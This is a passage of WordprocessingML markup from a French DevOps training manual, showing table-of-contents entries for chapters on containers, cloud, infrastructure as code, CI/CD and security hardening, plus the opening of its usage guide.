        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>63. Images reproductibles et sûres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>564</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>64. Réseaux et volumes Docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>571</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>65. Docker Compose : applications multi-services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>578</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>66. Kubernetes : modèle et objets fondamentaux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>586</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>67. Services, entrées et configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>594</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>68. Stockage et applications à état</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>603</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie IV — Cloud, provisionnement et configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>611</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>69. Helm et service mesh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>611</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>70. Modèles de cloud et architecture de référence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>621</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>71. AWS : services essentiels et bonnes pratiques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>628</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>72. Azure et Google Cloud : équivalents et choix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>636</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>73. Serverless : fonctions et événements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>643</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>74. Terraform : décrire l'infrastructure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>652</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>75. Pulumi : l'infrastructure en langage de programmation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>660</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>76. Ansible : configuration et idempotence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>668</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>77. Gestion de configuration : Chef, Puppet et stratégies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>676</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie V — Livraison, sécurité et exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>683</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>78. CI/CD : principes et structure d'un pipeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>683</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>79. GitHub Actions et GitLab CI en pratique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>692</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>80. Publications, versions et traçabilité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>701</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>81. GitOps : le dépôt comme source de vérité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>709</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>82. Gestion des secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>718</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>83. Observabilité : métriques, journaux et traces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>726</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>84. SRE : objectifs de fiabilité et gestion d'incident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>735</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie VI — Systèmes distribués et industrialisation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>743</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>85. Messagerie et files d'attente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>743</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>86. Tests de charge et performance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>752</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>87. Résilience : sauvegardes et reprise après sinistre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>760</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>88. FinOps : maîtriser le coût du cloud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>768</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>89. Plateforme interne et chemins d'or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>776</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>90. Sécurité de la chaîne logicielle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>784</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>91. Durcissement des conteneurs et du cluster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>792</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>92. Journalisation, audit et conservation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>801</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Partie VII — Mise en pratique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>809</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>93. Projet final : une plateforme du commit à la production</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>809</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Annexe A — Mémento des balises HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>819</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Annexe B — Aide-mémoire DevOps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>821</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Annexe C — Glossaire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>823</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Annexe D — Registre de pagination</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:tab/>
        <w:t>825</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>Comment utiliser ce document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ce document est un manuel, pas un roman. Il se lit avec un clavier, un éditeur de texte, un terminal et un navigateur ouverts. Les chapitres sont conçus pour être travaillés, pas seulement lus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Organisation générale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le volume comporte quatre niveaux de structuration, identifiables par leur style de titre :</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cours</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — deux ensembles autonomes, présentés chacun par une page d'ouverture, un mode d'emploi et un sommaire détaillé.</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Partie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
